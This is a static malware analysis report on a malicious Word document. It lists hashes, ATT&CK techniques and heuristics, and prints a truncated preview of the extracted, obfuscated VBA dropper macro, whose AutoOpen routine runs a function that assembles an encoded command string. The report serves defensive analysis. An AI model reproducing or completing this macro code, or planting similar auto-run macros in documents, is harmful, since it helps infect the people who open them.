Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edda45644917be8d…

MALICIOUS

Office (OLE)

246.5 KB Created: 2018-01-30 13:27:00 Authoring application: Microsoft Office Word First seen: 2018-02-07
MD5: b2f72b67902ff18c85472466bedce1bf SHA-1: bf6f00835e1b22114ef5e5867df7493057a35968 SHA-256: edda45644917be8d9bc0dcf2695195a54891663a0a866c64f968b6bea1aca4ae
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute a secondary payload. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a dropper or phishing lure.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 90347 bytes
SHA-256: 50caf1fbf8a592c17f69d2998b01ef8e91f5f2b3b84e5964a6fabda73f797996
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PdjPVCzmNBNTd"
Sub AutoOpen()
On Error Resume Next
MAADDGfXo = 8260205 + pcXAStvjJj - OPIb2 / Log(JuRzXdqz / Int(ENwDrYswibTc) - 9638617 * qJBkuirTOXCrF) / Qnf + Hex(FiBhqHQciTJt) / (zAiMhLE - Int(nWtvTrkwbBA) - 3711518 * ChrW(1146562 / AalmqZNfiaAdu + jKVfALRLH - CByte(7243624 + CLng(4505799 + ChrW(3006776) - 6206330 - Chr(DSJauEAHavU)))))
fMIoTvpzR = 3466554 + jUStboSAO - OPIb2 / Log(sjcPRZiqSYj / Int(LVzIXoqiSOM) - 7413527 * pIAcMoajtmdj) / Qnf + Hex(BVGHztjFIz) / (SQiJjIiXpdcRiN - Int(kJuRiVc) - 9833376 * ChrW(7507226 / bKPTFjjKGJ + KQzkIFquZDYtsI - CByte(4498753 + CLng(2273621 + ChrW(8311802) - 2892991 - Chr(qRroEwOEjz)))))
vHcDLZtuj = 5021939 + lENRDQWKi - OPIb2 / Log(pvhTdTbvmt / Int(Hwdvwqh) - 6728932 * RKoIENdWAhr) / Qnf + Hex(BdGMujiGRzujOi) / (kWHapbDC - Int(GYPQpFuFCHF) - 3622384 * ChrW(4301539 / BGwcNSQItaEs + sGBSzac - CByte(1063768 + CLng(4255364 + ChrW(3949223) - 3515566 - Chr(LFoiHZpOm)))))
GTqwqkOzi = 7895211 + wEBwAoHr - OPIb2 / Log(ifmjLBMbimAPiO / Int(nKTGpNHrfHUG) - 699411 * dSRzUIbhKnpXm) / Qnf + Hex(sovSqOKpUA) / (jWnGZru - Int(lATjSKFL) - 1204016 * ChrW(86688 / RSaozrLBQof + wRvnlnalwvOBT - CByte(4772532 + CLng(958855 + ChrW(5601983) - 1492956 - Chr(DEoojjFioPNp)))))
Application.Run "RXWidOVZji", nSZOQJfWcU
iUFLVSWXU = 4655326 + PjVDZUamiuf - OPIb2 / Log(azJhLhCwKXHR / Int(vHDmGkQfYZFNjj) - 2651366 * divwjfMLk) / Qnf + Hex(pRZUrbDJ) / (NWzcJPGBZET - Int(BokhsMSLQus) - 418809 * ChrW(8990525 / wFDhdJWDArdClj + dmGRjocpnzP - CByte(7148097 + CLng(9715730 + ChrW(2443260) - 3566703 - Chr(zhOQAzsbJIz)))))
osEqajinI = 7409692 + OGVPQiOYYqhO - OPIb2 / Log(UXTbfuiHXqo / Int(jIoCQZJrMTHulh) - 1801847 * kkHHiXVDP) / Qnf + Hex(HOHdqQhS) / (aaWIRXWUBQYq - Int(kRWnjhTLmkmJRv) - 6827357 * ChrW(6646495 / rNSzjmOcpjH + UnrPJdq - CByte(1347798 + CLng(600191 + ChrW(6290140) - 80541 - Chr(WnpkwzbnlYZKYw)))))
BiILtzMHR = 9476587 + tHStbZKNTcvzdd - OPIb2 / Log(HTRvOhrKbLwrn / Int(nOVsqFs) - 1844152 * KzOzEVGhfhDqsp) / Qnf + Hex(jNBwqidhXK) / (OZFnYzzZHwz - Int(noViTJjMuYzJ) - 5584485 * ChrW(674366 / SLjRrnYHjbrJFs + hZjdOIVDJ - CByte(4595046 + CLng(7659597 + ChrW(9681338) - 7261648 - Chr(ZwKUCiNafHwOh)))))
oCbAdTbqa = 4901879 + omzIXtDomRGfho - OPIb2 / Log(NEHtbhA / Int(jBiXKfJwzWK) - 6150443 * hFDlEHbPi) / Qnf + Hex(tLbFXjjzRo) / (QGpWtJcS - Int(JWImjzDI) - 4556238 * ChrW(5113734 / LwioLiZmPS + trERwOPKzz - CByte(9297696 + CLng(5139574 + ChrW(2604504) - 4449958 - Chr(oZXjYZq)))))
End Sub
Function nSZOQJfWcU()
On Error Resume Next
IOCki = ("Zu3Hw856:164V73K44@116:123:102R40I75:40s44:156s163:141:144V141K163s144s56c156I145V170_164R50@61g60c60c60g60R54g40@62K70R62I61:63I63R51R73K44@101c104:103g130R40g75_40_47g15g12IMnk015NNPF769qqG2ZjJI0G")
PZzZpaX = 7128153 + UKwYEnfIzprq - OPIb2 / Log(TLDIkMcirlzpX / Int(PjRfzvYPaWwQ) - 1249444 * OKhYNIHJCnzi) / Qnf + Hex(BcYwjhFQ) / (iKruRDlhLT - Int(vQhEZbP) - 5061467 * ChrW(1028466 / ifRnWmBXNjBQ + bXjSqDYVbjcNl - CByte(9127304 + CLng(3913514 + ChrW(4919690) - 1467856 - Chr(fKsEiaHvR)))))
MfjrHGh = 6928203 + wjEiaFhs - OPIb2 / Log(YWhLCzoa / Int(qhwFRVGwXsGL) - 9089293 * oLdwXiKpnhwt) / Qnf + Hex(dhBflhKa) / (LsSiYdi - Int(mzdkszZCRraBu) - 3212024 * ChrW(1322528 / NcPVMUikLl + kioKjHwvBPYkhc - CByte(5527533 + CLng(3866337 + ChrW(8032300) - 6942212 - Chr(IultVvOMbR)))))
dqcPMzYbT = Mid(IOCki, 7, 169)
OtckXlcT = ("MJ1joP1XMlZvEB6J0k2uZHm1ZrSDs166K157c47_53V47s153g47I53I47s145g55s111g164s14WwSIq6paTRu")
SNvNf = 959771 + PNJPcquZaz - OPIb2 / Log(zuTFOTEE / Int(jiWXcJfaLuCpuS) - 5099489 * DwfHnFoRQ) / Qnf + Hex(dpjHaaOGqjqmm) / (KTOjvSFct - Int(LXYwLduEHojq) - 8205679 * ChrW(626297 / bboctbQJNz + rIWzjAwzw - CByte(674811 + CLng(325972 + ChrW(3469624) - 9017383 - Chr(mlfwlUdK)))))
SWzTr = 2414529 + rQAzLuNLzr - OPIb2 / Log(liJFfutGQZIt / Int(HplKccqhv) - 468905 * SAwm
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.